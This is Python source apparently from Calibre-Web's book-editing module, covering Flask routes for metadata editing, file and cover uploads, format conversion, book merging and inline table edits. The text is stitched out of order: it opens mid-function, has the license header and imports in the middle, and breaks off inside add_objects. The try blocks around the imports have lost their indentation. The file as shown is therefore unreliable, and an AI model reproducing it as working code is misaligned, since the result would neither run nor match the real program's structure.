        to_save[cc_string] = str(int(float(to_save[cc_string]) * 2))
    if to_save[cc_string].strip() != cc_db_value:
        if cc_db_value is not None:
            # remove old cc_val
            del_cc = getattr(book, cc_string)[0]
            getattr(book, cc_string).remove(del_cc)
            if len(del_cc.books) == 0:
                calibre_db.session.delete(del_cc)
                changed = True
        cc_class = db.cc_classes[c.id]
        new_cc = calibre_db.session.query(cc_class).filter(
            cc_class.value == to_save[cc_string].strip()).first()
        # if no cc val is found add it
        if new_cc is None:
            new_cc = cc_class(value=to_save[cc_string].strip())
            calibre_db.session.add(new_cc)
            changed = True
            # flush so the fresh row can be re-queried with an id
            calibre_db.session.flush()
            new_cc = calibre_db.session.query(cc_class).filter(
                cc_class.value == to_save[cc_string].strip()).first()
        # add cc value to book
        getattr(book, cc_string).append(new_cc)
    return changed, to_save
def edit_cc_data(book_id, book, to_save):
    """Apply all custom-column form fields ('custom_column_<id>') to the book.

    Single-value columns are routed to edit_cc_data_value/_string; blank
    input clears the value. Multi-value columns are synced like tags.
    Returns True when anything changed.
    """
    changed = False
    cc = calibre_db.session.query(db.Custom_Columns).filter(db.Custom_Columns.datatype.notin_(db.cc_exceptions)).all()
    for c in cc:
        cc_string = "custom_column_" + str(c.id)
        if not c.is_multiple:
            if len(getattr(book, cc_string)) > 0:
                cc_db_value = getattr(book, cc_string)[0].value
            else:
                cc_db_value = None
            if to_save[cc_string].strip():
                if c.datatype in ['int', 'bool', 'float', "datetime", "comments"]:
                    changed, to_save = edit_cc_data_value(book_id, book, c, to_save, cc_db_value, cc_string)
                else:
                    changed, to_save = edit_cc_data_string(book, c, to_save, cc_db_value, cc_string)
            else:
                if cc_db_value is not None:
                    # remove old cc_val
                    del_cc = getattr(book, cc_string)[0]
                    getattr(book, cc_string).remove(del_cc)
                    if not del_cc.books or len(del_cc.books) == 0:
                        calibre_db.session.delete(del_cc)
                        changed = True
        else:
            # multi-value column behaves like a tag list
            input_tags = to_save[cc_string].split(',')
            input_tags = list(map(lambda it: it.strip(), input_tags))
            changed |= modify_database_object(input_tags,
                                              getattr(book, cc_string),
                                              db.cc_classes[c.id],
                                              calibre_db.session,
                                              'custom')
    return changed
def upload_single_file(request, book, book_id):
    """Handle the 'btn-upload-format' file field of the edit form.

    Validates the extension, saves the file into the book's calibre
    directory, registers a new format row if needed, queues an upload
    notification, and returns the uploader's extracted metadata.
    On validation/storage errors a redirect response is returned instead;
    with no file submitted the function returns None implicitly.
    """
    # Check and handle Uploaded file
    if 'btn-upload-format' in request.files:
        requested_file = request.files['btn-upload-format']
        # check for empty request
        if requested_file.filename != '':
            if not current_user.role_upload():
                abort(403)
            if '.' in requested_file.filename:
                file_ext = requested_file.filename.rsplit('.', 1)[-1].lower()
                if file_ext not in constants.EXTENSIONS_UPLOAD and '' not in constants.EXTENSIONS_UPLOAD:
                    flash(_("File extension '%(ext)s' is not allowed to be uploaded to this server", ext=file_ext),
                          category="error")
                    return redirect(url_for('web.show_book', book_id=book.id))
            else:
                flash(_('File to be uploaded must have an extension'), category="error")
                return redirect(url_for('web.show_book', book_id=book.id))
            file_name = book.path.rsplit('/', 1)[-1]
            filepath = os.path.normpath(os.path.join(config.config_calibre_dir, book.path))
            saved_filename = os.path.join(filepath, file_name + '.' + file_ext)
            # check if file path exists, otherwise create it, copy file to calibre path and delete temp file
            if not os.path.exists(filepath):
                try:
                    os.makedirs(filepath)
                except OSError:
                    flash(_(u"Failed to create path %(path)s (Permission denied).", path=filepath), category="error")
                    return redirect(url_for('web.show_book', book_id=book.id))
            try:
                requested_file.save(saved_filename)
            except OSError:
                flash(_(u"Failed to store file %(file)s.", file=saved_filename), category="error")
                return redirect(url_for('web.show_book', book_id=book.id))
            file_size = os.path.getsize(saved_filename)
            is_format = calibre_db.get_book_format(book_id, file_ext.upper())
            # Format entry already exists, no need to update the database
            if is_format:
                log.warning('Book format %s already existing', file_ext.upper())
            else:
                try:
                    db_format = db.Data(book_id, file_ext.upper(), file_size, file_name)
                    calibre_db.session.add(db_format)
                    calibre_db.session.commit()
                    calibre_db.update_title_sort(config)
                except (OperationalError, IntegrityError) as e:
                    calibre_db.session.rollback()
                    log.error('Database error: %s', e)
                    flash(_(u"Database error: %(error)s.", error=e), category="error")
                    return redirect(url_for('web.show_book', book_id=book.id))
            # Queue uploader info
            uploadText=_(u"File format %(ext)s added to %(book)s", ext=file_ext.upper(), book=book.title)
            WorkerThread.add(current_user.name, TaskUpload(
                "<a href=\"" + url_for('web.show_book', book_id=book.id) + "\">" + uploadText + "</a>"))
            return uploader.process(
                saved_filename, *os.path.splitext(requested_file.filename),
                rarExecutable=config.config_rarfile_location)
def upload_cover(request, book):
    """Store a cover image submitted via the 'btn-upload-cover' field.

    Returns True on success, False on failure, None when no cover was sent.
    """
    if 'btn-upload-cover' not in request.files:
        return None
    requested_file = request.files['btn-upload-cover']
    # browsers submit an empty filename when no file was chosen
    if requested_file.filename == '':
        return None
    if not current_user.role_upload():
        abort(403)
    ret, message = helper.save_cover(requested_file, book.path)
    if ret is True:
        return True
    flash(message, category="error")
    return False
def handle_title_on_edit(book, book_title):
    """Update the book title from the form; returns True when it changed."""
    book_title = book_title.rstrip().strip()
    if book.title == book_title:
        return False
    # an emptied title falls back to the localized 'Unknown' placeholder
    if book_title == '':
        book_title = _(u'Unknown')
    book.title = book_title
    return True
def handle_author_on_edit(book, author_name, update_stored=True):
    """Sync the book's authors with the '&'-separated form input.

    Returns (input_authors, change): the normalized author list and a flag
    saying whether the author set or the author_sort field was modified.
    """
    # handle author(s)
    input_authors = author_name.split('&')
    # commas inside a single author name are stored as '|' in calibre
    input_authors = list(map(lambda it: it.strip().replace(',', '|'), input_authors))
    # Remove duplicates in authors list
    input_authors = helper.uniq(input_authors)
    # we have all author names now
    if input_authors == ['']:
        input_authors = [_(u'Unknown')]  # prevent empty Author
    change = modify_database_object(input_authors, book.authors, db.Authors, calibre_db.session, 'author')
    # Search for each author if author is in database, if not, author name and sorted author name is generated new
    # everything then is assembled for sorted author field in database
    sort_authors_list = list()
    for inp in input_authors:
        stored_author = calibre_db.session.query(db.Authors).filter(db.Authors.name == inp).first()
        if not stored_author:
            stored_author = helper.get_sorted_author(inp)
        else:
            stored_author = stored_author.sort
        sort_authors_list.append(helper.get_sorted_author(stored_author))
    sort_authors = ' & '.join(sort_authors_list)
    if book.author_sort != sort_authors and update_stored:
        book.author_sort = sort_authors
        change = True
    return input_authors, change
@editbook.route("/admin/book/<int:book_id>", methods=['GET', 'POST'])
@login_required_if_no_ano
@edit_required
def edit_book(book_id):
    """Show the edit form (GET) or apply all submitted metadata changes (POST).

    Merges metadata extracted from an optionally uploaded format file with
    the form fields, updates every metadata facet via the edit_* helpers,
    and commits. Any exception rolls the session back and redirects to the
    book's detail page with an error flash.
    """
    modif_date = False
    # create the function for sorting...
    try:
        calibre_db.update_title_sort(config)
    except sqliteOperationalError as e:
        log.debug_or_exception(e)
        calibre_db.session.rollback()
    # Show form
    if request.method != 'POST':
        return render_edit_book(book_id)
    book = calibre_db.get_filtered_book(book_id, allow_show_archived=True)
    # Book not found
    if not book:
        flash(_(u"Oops! Selected book title is unavailable. File does not exist or is not accessible"), category="error")
        return redirect(url_for("web.index"))
    meta = upload_single_file(request, book, book_id)
    if upload_cover(request, book) is True:
        book.has_cover = 1
        modif_date = True
    try:
        to_save = request.form.to_dict()
        merge_metadata(to_save, meta)
        # Update book
        edited_books_id = None
        # handle book title
        title_change = handle_title_on_edit(book, to_save["book_title"])
        input_authors, authorchange = handle_author_on_edit(book, to_save["author_name"])
        if authorchange or title_change:
            # title/author changes may require renaming the on-disk folder
            edited_books_id = book.id
            modif_date = True
        if config.config_use_google_drive:
            gdriveutils.updateGdriveCalibreFromLocal()
        error = False
        if edited_books_id:
            error = helper.update_dir_stucture(edited_books_id, config.config_calibre_dir, input_authors[0])
        if not error:
            if "cover_url" in to_save:
                if to_save["cover_url"]:
                    if not current_user.role_upload():
                        return "", (403)
                    if to_save["cover_url"].endswith('/static/generic_cover.jpg'):
                        book.has_cover = 0
                    else:
                        result, error = helper.save_cover_from_url(to_save["cover_url"], book.path)
                        if result is True:
                            book.has_cover = 1
                            modif_date = True
                        else:
                            flash(error, category="error")
            # Add default series_index to book
            modif_date |= edit_book_series_index(to_save["series_index"], book)
            # Handle book comments/description
            modif_date |= edit_book_comments(Markup(to_save['description']).unescape(), book)
            # Handle identifiers
            input_identifiers = identifier_list(to_save, book)
            modification, warning = modify_identifiers(input_identifiers, book.identifiers, calibre_db.session)
            if warning:
                flash(_("Identifiers are not Case Sensitive, Overwriting Old Identifier"), category="warning")
            modif_date |= modification
            # Handle book tags
            modif_date |= edit_book_tags(to_save['tags'], book)
            # Handle book series
            modif_date |= edit_book_series(to_save["series"], book)
            # handle book publisher
            modif_date |= edit_book_publisher(to_save['publisher'], book)
            # handle book languages
            modif_date |= edit_book_languages(to_save['languages'], book)
            # handle book ratings
            modif_date |= edit_book_ratings(to_save, book)
            # handle cc data
            modif_date |= edit_cc_data(book_id, book, to_save)
            if to_save["pubdate"]:
                try:
                    book.pubdate = datetime.strptime(to_save["pubdate"], "%Y-%m-%d")
                except ValueError:
                    book.pubdate = db.Books.DEFAULT_PUBDATE
            else:
                book.pubdate = db.Books.DEFAULT_PUBDATE
            if modif_date:
                book.last_modified = datetime.utcnow()
            calibre_db.session.merge(book)
            calibre_db.session.commit()
            if config.config_use_google_drive:
                gdriveutils.updateGdriveCalibreFromLocal()
            if "detail_view" in to_save:
                return redirect(url_for('web.show_book', book_id=book.id))
            else:
                flash(_("Metadata successfully updated"), category="success")
                return render_edit_book(book_id)
        else:
            calibre_db.session.rollback()
            flash(error, category="error")
            return render_edit_book(book_id)
    except Exception as ex:
        log.debug_or_exception(ex)
        calibre_db.session.rollback()
        flash(_("Error editing book, please check logfile for details"), category="error")
        return redirect(url_for('web.show_book', book_id=book.id))
def merge_metadata(to_save, meta):
    """Fill empty form fields from metadata extracted from an uploaded file."""
    # 'Unknown' placeholders count as empty so real file metadata can win
    if to_save['author_name'] == _(u'Unknown'):
        to_save['author_name'] = ''
    if to_save['book_title'] == _(u'Unknown'):
        to_save['book_title'] = ''
    field_map = [('tags', 'tags'),
                 ('author_name', 'author'),
                 ('series', 'series'),
                 ('series_index', 'series_id'),
                 ('languages', 'languages'),
                 ('book_title', 'title')]
    for form_field, meta_field in field_map:
        to_save[form_field] = to_save[form_field] or getattr(meta, meta_field, '')
    to_save["description"] = to_save["description"] or Markup(
        getattr(meta, 'description', '')).unescape()
def identifier_list(to_save, book):
    """Generate a list of Identifiers from form information.

    Each 'identifier-type-<n>' key is paired with its 'identifier-val-<n>'
    partner; type fields without a matching value field are ignored.
    """
    type_prefix = 'identifier-type-'
    val_prefix = 'identifier-val-'
    identifiers = []
    for key, id_type in to_save.items():
        if key.startswith(type_prefix):
            value_key = val_prefix + key[len(type_prefix):]
            if value_key in to_save:
                identifiers.append(db.Identifiers(to_save[value_key], id_type, book.id))
    return identifiers
def prepare_authors_on_upload(title, authr):
    """Normalize the uploaded book's author string and resolve authors.

    Warns when a book with the same title/author probably already exists.
    Returns (sort_authors, input_authors, db_author) where db_author is the
    Authors row used for the book's directory name.
    """
    if title != _(u'Unknown') and authr != _(u'Unknown'):
        entry = calibre_db.check_exists_book(authr, title)
        if entry:
            log.info("Uploaded book probably exists in library")
            flash(_(u"Uploaded book probably exists in the library, consider to change before upload new: ")
                  + Markup(render_title_template('book_exists_flash.html', entry=entry)), category="warning")
    # handle authors
    input_authors = authr.split('&')
    # handle_authors(input_authors)
    input_authors = list(map(lambda it: it.strip().replace(',', '|'), input_authors))
    # Remove duplicates in authors list
    input_authors = helper.uniq(input_authors)
    # we have all author names now
    if input_authors == ['']:
        input_authors = [_(u'Unknown')]  # prevent empty Author
    sort_authors_list = list()
    db_author = None
    for inp in input_authors:
        stored_author = calibre_db.session.query(db.Authors).filter(db.Authors.name == inp).first()
        if not stored_author:
            # first unknown author becomes the row used for the folder name
            if not db_author:
                db_author = db.Authors(inp, helper.get_sorted_author(inp), "")
                calibre_db.session.add(db_author)
                calibre_db.session.commit()
            sort_author = helper.get_sorted_author(inp)
        else:
            if not db_author:
                db_author = stored_author
            sort_author = stored_author.sort
        sort_authors_list.append(sort_author)
    sort_authors = ' & '.join(sort_authors_list)
    return sort_authors, input_authors, db_author
def create_book_on_upload(modif_date, meta):
    """Create the database rows for a freshly uploaded book.

    Builds the Books row from the uploader's metadata, attaches authors,
    series, languages, tags, publisher and the format Data row, then
    flushes so db_book.id becomes available. Returns
    (db_book, input_authors, title_dir).
    """
    title = meta.title
    authr = meta.author
    sort_authors, input_authors, db_author = prepare_authors_on_upload(title, authr)
    title_dir = helper.get_valid_filename(title)
    author_dir = helper.get_valid_filename(db_author.name)
    # combine path and normalize path from windows systems
    path = os.path.join(author_dir, title_dir).replace('\\', '/')
    # Calibre adds books with utc as timezone
    db_book = db.Books(title, "", sort_authors, datetime.utcnow(), datetime(101, 1, 1),
                       '1', datetime.utcnow(), path, meta.cover, db_author, [], "")
    modif_date |= modify_database_object(input_authors, db_book.authors, db.Authors, calibre_db.session,
                                         'author')
    # Add series_index to book
    modif_date |= edit_book_series_index(meta.series_id, db_book)
    # add languages
    modif_date |= edit_book_languages(meta.languages, db_book, upload=True)
    # handle tags
    modif_date |= edit_book_tags(meta.tags, db_book)
    # handle publisher
    modif_date |= edit_book_publisher(meta.publisher, db_book)
    # handle series
    modif_date |= edit_book_series(meta.series, db_book)
    # Add file to book
    file_size = os.path.getsize(meta.file_path)
    db_data = db.Data(db_book, meta.extension.upper()[1:], file_size, title_dir)
    db_book.data.append(db_data)
    calibre_db.session.add(db_book)
    # flush content, get db_book.id available
    calibre_db.session.flush()
    return db_book, input_authors, title_dir
def file_handling_on_upload(requested_file):
    """Validate an uploaded file's extension and extract its metadata.

    Returns (meta, None) on success, or (None, json_response) when the
    extension is not allowed / missing or metadata extraction failed.
    """
    # check if file extension is correct
    if '.' in requested_file.filename:
        file_ext = requested_file.filename.rsplit('.', 1)[-1].lower()
        if file_ext not in constants.EXTENSIONS_UPLOAD and '' not in constants.EXTENSIONS_UPLOAD:
            flash(
                _("File extension '%(ext)s' is not allowed to be uploaded to this server",
                  ext=file_ext), category="error")
            return None, Response(json.dumps({"location": url_for("web.index")}), mimetype='application/json')
    else:
        flash(_('File to be uploaded must have an extension'), category="error")
        return None, Response(json.dumps({"location": url_for("web.index")}), mimetype='application/json')
    # extract metadata from file
    try:
        meta = uploader.upload(requested_file, config.config_rarfile_location)
    except (IOError, OSError):
        log.error("File %s could not saved to temp dir", requested_file.filename)
        flash(_(u"File %(filename)s could not saved to temp dir",
                filename=requested_file.filename), category="error")
        return None, Response(json.dumps({"location": url_for("web.index")}), mimetype='application/json')
    return meta, None
def move_coverfile(meta, db_book):
    """Copy the extracted (or generic) cover into the book's directory.

    The temporary cover file is removed after copying; failures are
    logged and flashed but do not abort the upload.
    """
    # move cover to final directory, including book id
    if meta.cover:
        coverfile = meta.cover
    else:
        # no cover extracted -> fall back to the bundled placeholder image
        coverfile = os.path.join(constants.STATIC_DIR, 'generic_cover.jpg')
    new_coverpath = os.path.join(config.config_calibre_dir, db_book.path, "cover.jpg")
    try:
        copyfile(coverfile, new_coverpath)
        if meta.cover:
            os.unlink(meta.cover)
    except OSError as e:
        log.error("Failed to move cover file %s: %s", new_coverpath, e)
        flash(_(u"Failed to Move Cover File %(file)s: %(error)s", file=new_coverpath,
                error=e),
              category="error")
@editbook.route("/upload", methods=["GET", "POST"])
@login_required_if_no_ano
@upload_required
def upload():
    """Accept one or more uploaded book files and add them to the library.

    For each file: validate & extract metadata, create the database rows,
    move file and cover into place, commit, and queue a notification.
    Answers JSON with the location to redirect to.
    """
    if not config.config_uploading:
        abort(404)
    if request.method == 'POST' and 'btn-upload' in request.files:
        for requested_file in request.files.getlist("btn-upload"):
            try:
                modif_date = False
                # create the function for sorting...
                calibre_db.update_title_sort(config)
                calibre_db.session.connection().connection.connection.create_function('uuid4', 0, lambda: str(uuid4()))
                meta, error = file_handling_on_upload(requested_file)
                if error:
                    return error
                db_book, input_authors, title_dir = create_book_on_upload(modif_date, meta)
                # Comments needs book id therefore only possible after flush
                modif_date |= edit_book_comments(Markup(meta.description).unescape(), db_book)
                book_id = db_book.id
                title = db_book.title
                error = helper.update_dir_structure_file(book_id,
                                                         config.config_calibre_dir,
                                                         input_authors[0],
                                                         meta.file_path,
                                                         title_dir + meta.extension.lower())
                move_coverfile(meta, db_book)
                # save data to database, reread data
                calibre_db.session.commit()
                if config.config_use_google_drive:
                    gdriveutils.updateGdriveCalibreFromLocal()
                if error:
                    flash(error, category="error")
                uploadText=_(u"File %(file)s uploaded", file=title)
                WorkerThread.add(current_user.name, TaskUpload(
                    "<a href=\"" + url_for('web.show_book', book_id=book_id) + "\">" + uploadText + "</a>"))
                # single-file upload redirects straight to the new book
                if len(request.files.getlist("btn-upload")) < 2:
                    if current_user.role_edit() or current_user.role_admin():
                        resp = {"location": url_for('editbook.edit_book', book_id=book_id)}
                        return Response(json.dumps(resp), mimetype='application/json')
                    else:
                        resp = {"location": url_for('web.show_book', book_id=book_id)}
                        return Response(json.dumps(resp), mimetype='application/json')
            except (OperationalError, IntegrityError) as e:
                calibre_db.session.rollback()
                log.error("Database error: %s", e)
                flash(_(u"Database error: %(error)s.", error=e), category="error")
    return Response(json.dumps({"location": url_for("web.index")}), mimetype='application/json')
@editbook.route("/admin/book/convert/<int:book_id>", methods=['POST'])
@login_required_if_no_ano
@edit_required
def convert_bookformat(book_id):
    """Queue a format conversion for one book and redirect to its edit page."""
    # check to see if we have form fields to work with - if not send user back
    book_format_from = request.form.get('book_format_from', None)
    book_format_to = request.form.get('book_format_to', None)
    if (book_format_from is None) or (book_format_to is None):
        flash(_(u"Source or destination format for conversion missing"), category="error")
        return redirect(url_for('editbook.edit_book', book_id=book_id))
    log.info('converting: book id: %s from: %s to: %s', book_id, book_format_from, book_format_to)
    # rtn is None on success, otherwise an error description
    rtn = helper.convert_book_format(book_id, config.config_calibre_dir, book_format_from.upper(),
                                     book_format_to.upper(), current_user.name)
    if rtn is None:
        flash(_(u"Book successfully queued for converting to %(book_format)s",
                book_format=book_format_to),
              category="success")
    else:
        flash(_(u"There was an error converting this book: %(res)s", res=rtn), category="error")
    return redirect(url_for('editbook.edit_book', book_id=book_id))
@editbook.route("/scholarsearch/<query>",methods=['GET'])
@login_required_if_no_ano
@edit_required
def scholar_search(query):
    """Return up to ten Google Scholar results for *query* as JSON.

    When the optional scholarly package is missing an empty JSON list is
    returned instead.
    """
    if not have_scholar:
        return "[]"
    publications = []
    scholar_gen = scholarly.search_pubs(' '.join(query.split('+')))
    for count, publication in enumerate(scholar_gen, start=1):
        # drop the bulky raw source blob before serialising
        del publication['source']
        publications.append(publication)
        if count >= 10:
            break
    return Response(json.dumps(publications), mimetype='application/json')
@editbook.route("/ajax/editbooks/<param>", methods=['POST'])
@login_required_if_no_ano
@edit_required
def edit_list_book(param):
    """Inline table edit: update one field (*param*) of a single book.

    Expects form fields 'pk' (book id) and 'value' (new content); answers
    with the JSON shape the books-table editor expects.
    """
    vals = request.form.to_dict()
    book = calibre_db.get_book(vals['pk'])
    ret = ""
    if param =='series_index':
        edit_book_series_index(vals['value'], book)
        ret = Response(json.dumps({'success': True, 'newValue': book.series_index}), mimetype='application/json')
    elif param =='tags':
        edit_book_tags(vals['value'], book)
        ret = Response(json.dumps({'success': True, 'newValue': ', '.join([tag.name for tag in book.tags])}),
                       mimetype='application/json')
    elif param =='series':
        edit_book_series(vals['value'], book)
        ret = Response(json.dumps({'success': True, 'newValue': ', '.join([serie.name for serie in book.series])}),
                       mimetype='application/json')
    elif param =='publishers':
        edit_book_publisher(vals['value'], book)
        ret = Response(json.dumps({'success': True,
                                   'newValue': ', '.join([publisher.name for publisher in book.publishers])}),
                       mimetype='application/json')
    elif param =='languages':
        invalid = list()
        edit_book_languages(vals['value'], book, invalid=invalid)
        if invalid:
            ret = Response(json.dumps({'success': False,
                                       'msg': 'Invalid languages in request: {}'.format(','.join(invalid))}),
                           mimetype='application/json')
        else:
            # translate stored language codes into display names
            lang_names = list()
            for lang in book.languages:
                try:
                    lang_names.append(LC.parse(lang.lang_code).get_language_name(get_locale()))
                except UnknownLocaleError:
                    lang_names.append(_(isoLanguages.get(part3=lang.lang_code).name))
            ret = Response(json.dumps({'success': True, 'newValue': ', '.join(lang_names)}),
                           mimetype='application/json')
    elif param =='author_sort':
        book.author_sort = vals['value']
        ret = Response(json.dumps({'success': True, 'newValue': book.author_sort}),
                       mimetype='application/json')
    elif param == 'title':
        # remember the current title sort so it can be restored below
        sort = book.sort
        handle_title_on_edit(book, vals.get('value', ""))
        helper.update_dir_stucture(book.id, config.config_calibre_dir)
        ret = Response(json.dumps({'success': True, 'newValue': book.title}),
                       mimetype='application/json')
    elif param =='sort':
        book.sort = vals['value']
        ret = Response(json.dumps({'success': True, 'newValue': book.sort}),
                       mimetype='application/json')
    elif param =='authors':
        input_authors, __ = handle_author_on_edit(book, vals['value'], vals.get('checkA', None) == "true")
        helper.update_dir_stucture(book.id, config.config_calibre_dir, input_authors[0])
        ret = Response(json.dumps({'success': True,
                                   'newValue': ' & '.join([author.replace('|',',') for author in input_authors])}),
                       mimetype='application/json')
    book.last_modified = datetime.utcnow()
    try:
        calibre_db.session.commit()
        # revert change for sort if automatic fields link is deactivated
        if param == 'title' and vals.get('checkT') == "false":
            book.sort = sort
            calibre_db.session.commit()
    except (OperationalError, IntegrityError) as e:
        calibre_db.session.rollback()
        log.error("Database error: %s", e)
    return ret
@editbook.route("/ajax/sort_value/<field>/<int:bookid>")
@login_required
def get_sorted_entry(field, bookid):
    """Return the counterpart sort value of one book field as JSON.

    'title'/'authors' answer with the stored sort values; 'sort' and
    'author_sort' answer with the display values (reverse direction).
    """
    if field in ['title', 'authors', 'sort', 'author_sort']:
        book = calibre_db.get_filtered_book(bookid)
        if book:
            if field == 'title':
                return json.dumps({'sort': book.sort})
            elif field == 'authors':
                return json.dumps({'author_sort': book.author_sort})
            if field == 'sort':
                return json.dumps({'sort': book.title})
            if field == 'author_sort':
                # NOTE(review): `book.author` looks inconsistent with the
                # other branches (`author_sort`, `title`); confirm db.Books
                # actually exposes an `author` attribute.
                return json.dumps({'author_sort': book.author})
    return ""
@editbook.route("/ajax/simulatemerge", methods=['POST'])
@login_required
@edit_required
def simulate_merge_list_book():
    """Preview a merge: report the target title and all source titles.

    Expects a JSON body with 'Merge_books' = [target_id, source_id, ...].
    Returns {'to': target_title, 'from': [source_titles]} as JSON, or an
    empty string when no ids were posted.
    """
    vals = request.get_json().get('Merge_books')
    if vals:
        to_book = calibre_db.get_book(vals[0]).title
        vals.pop(0)
        if to_book:
            # Fix: accumulate ALL source titles. The list used to be
            # re-created inside the loop, so only the last book was
            # reported (and no sources at all raised a NameError).
            from_book = []
            for book_id in vals:
                from_book.append(calibre_db.get_book(book_id).title)
            return json.dumps({'to': to_book, 'from': from_book})
    return ""
@editbook.route("/ajax/mergebooks", methods=['POST'])
@login_required
@edit_required
def merge_list_book():
    """Merge books: copy missing formats from the source books into the
    target book (first posted id), then delete the source books.

    Expects a JSON body with 'Merge_books' = [target_id, source_id, ...].
    """
    vals = request.get_json().get('Merge_books')
    to_file = list()
    if vals:
        # load all formats from target book
        to_book = calibre_db.get_book(vals[0])
        vals.pop(0)
        if to_book:
            for file in to_book.data:
                to_file.append(file.format)
            to_name = helper.get_valid_filename(to_book.title) + ' - ' + \
                      helper.get_valid_filename(to_book.authors[0].name)
            for book_id in vals:
                from_book = calibre_db.get_book(book_id)
                if from_book:
                    for element in from_book.data:
                        # only copy formats the target does not have yet
                        if element.format not in to_file:
                            # create new data entry with: book_id, book_format, uncompressed_size, name
                            filepath_new = os.path.normpath(os.path.join(config.config_calibre_dir,
                                                                         to_book.path,
                                                                         to_name + "." + element.format.lower()))
                            filepath_old = os.path.normpath(os.path.join(config.config_calibre_dir,
                                                                         from_book.path,
                                                                         element.name + "." + element.format.lower()))
                            copyfile(filepath_old, filepath_new)
                            to_book.data.append(db.Data(to_book.id,
                                                        element.format,
                                                        element.uncompressed_size,
                                                        to_name))
                    # remove the now-merged source book entirely
                    delete_book(from_book.id,"", True)
            return json.dumps({'success': True})
    return ""
@editbook.route("/ajax/xchange", methods=['POST'])
@login_required
@edit_required
def table_xchange_author_title():
    """Swap title and author(s) for every book id posted in 'xchange'."""
    vals = request.get_json().get('xchange')
    if vals:
        for val in vals:
            modif_date = False
            # Fix: initialise per book. Previously this name was only bound
            # when a change occurred, raising NameError for an unchanged
            # book and carrying a stale id across loop iterations.
            edited_books_id = False
            book = calibre_db.get_book(val)
            authors = book.title
            entries = calibre_db.order_authors(book)
            author_names = []
            for authr in entries.authors:
                author_names.append(authr.name.replace('|', ','))
            # new title is the joined author list; new authors are the old title
            title_change = handle_title_on_edit(book, " ".join(author_names))
            input_authors, authorchange = handle_author_on_edit(book, authors)
            if authorchange or title_change:
                edited_books_id = book.id
                modif_date = True
            if config.config_use_google_drive:
                gdriveutils.updateGdriveCalibreFromLocal()
            if edited_books_id:
                helper.update_dir_stucture(edited_books_id, config.config_calibre_dir, input_authors[0])
            if modif_date:
                book.last_modified = datetime.utcnow()
            try:
                calibre_db.session.commit()
            except (OperationalError, IntegrityError) as e:
                calibre_db.session.rollback()
                log.error("Database error: %s", e)
                return json.dumps({'success': False})
        if config.config_use_google_drive:
            gdriveutils.updateGdriveCalibreFromLocal()
        return json.dumps({'success': True})
    return ""
# -*- coding: utf-8 -*-
# This file is part of the Calibre-Web (https://github.com/janeczku/calibre-web)
# Copyright (C) 2018-2019 OzzieIsaacs, cervinko, jkrehm, bodybybuddha, ok11,
# andy29485, idalin, Kyosfonica, wuqi, Kennyl, lemmsh,
# falgh1, grunjol, csitko, ytils, xybydy, trasba, vrabe,
# ruben-herold, marblepebble, JackED42, SiphonSquirrel,
# apetresc, nanu-c, mutschler
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import division, print_function, unicode_literals
import os
from datetime import datetime
import json
from shutil import copyfile
from uuid import uuid4
from lxml.html.clean import clean_html
# Improve this to check if scholarly is available in a global way, like other pythonic libraries
try:
from scholarly import scholarly
have_scholar = True
except ImportError:
have_scholar = False
from babel import Locale as LC
from babel.core import UnknownLocaleError
from flask import Blueprint, request, flash, redirect, url_for, abort, Markup, Response
from flask_babel import gettext as _
from flask_login import current_user, login_required
from sqlalchemy.exc import OperationalError, IntegrityError
from sqlite3 import OperationalError as sqliteOperationalError
from . import constants, logger, isoLanguages, gdriveutils, uploader, helper
from . import config, get_locale, ub, db
from . import calibre_db
from .services.worker import WorkerThread
from .tasks.upload import TaskUpload
from .render_template import render_title_template
from .usermanagement import login_required_if_no_ano
try:
from functools import wraps
except ImportError:
pass # We're not using Python 3
# Blueprint carrying all metadata-editing routes of the application
editbook = Blueprint('editbook', __name__)
# module-level logger
log = logger.create()
def upload_required(f):
    """View decorator: allow only users with upload (or admin) rights."""
    @wraps(f)
    def inner(*args, **kwargs):
        if not (current_user.role_upload() or current_user.role_admin()):
            abort(403)
        return f(*args, **kwargs)
    return inner
def edit_required(f):
    """View decorator: allow only users with edit (or admin) rights."""
    @wraps(f)
    def inner(*args, **kwargs):
        if not (current_user.role_edit() or current_user.role_admin()):
            abort(403)
        return f(*args, **kwargs)
    return inner
def search_objects_remove(db_book_object, db_type, input_elements):
    """Return the members of *db_book_object* that no longer appear in
    *input_elements* (case-insensitive) and therefore must be unlinked."""
    if db_type == 'languages':
        def key(element):
            return element.lang_code
    elif db_type == 'custom':
        def key(element):
            return element.value
    else:
        def key(element):
            return element.name
    wanted = {entry.lower() for entry in input_elements}
    return [element for element in db_book_object if key(element).lower() not in wanted]
def search_objects_add(db_book_object, db_type, input_elements):
    """Return the entries of *input_elements* that are not yet linked to
    the book (exact, case-sensitive comparison)."""
    if db_type == 'languages':
        existing = {element.lang_code for element in db_book_object}
    elif db_type == 'custom':
        existing = {element.value for element in db_book_object}
    else:
        existing = {element.name for element in db_book_object}
    return [entry for entry in input_elements if entry not in existing]
def remove_objects(db_book_object, db_session, del_elements):
    """Unlink every element in *del_elements* from the book.

    Elements that are no longer referenced by any book are deleted from
    the database as well.  Returns True when anything was removed.
    """
    changed = bool(del_elements)
    for del_element in del_elements:
        db_book_object.remove(del_element)
        # orphaned rows are garbage-collected from the database
        if not del_element.books:
            db_session.delete(del_element)
    return changed
def add_objects(db_book_object, db_object, db_session, db_type, add_elements):
    """Link each name in *add_elements* to the book, creating database
    rows for names that do not exist yet.

    Fixes over the previous version: the duplicated ``changed = True`` in
    the reuse branch is gone, and a new ORM instance is only constructed
    when no matching row exists (it used to be built and discarded).
    Returns True when anything was linked or created.
    """
    changed = False
    if db_type == 'languages':
        db_filter = db_object.lang_code
    elif db_type == 'custom':
        db_filter = db_object.value
    else:
        db_filter = db_object.name
    for add_element in add_elements:
        # check if an element with that name already exists
        db_element = db_session.query(db_object).filter(db_filter == add_element).first()
        if db_element is None:
            # constructor signature differs per object type
            if db_type == 'author':
                new_element = db_object(add_element, helper.get_sorted_author(add_element.replace('|', ',')), "")
            elif db_type == 'series':
                new_element = db_object(add_element, add_element)
            elif db_type == 'custom':
                new_element = db_object(value=add_element)
            elif db_type == 'publisher':
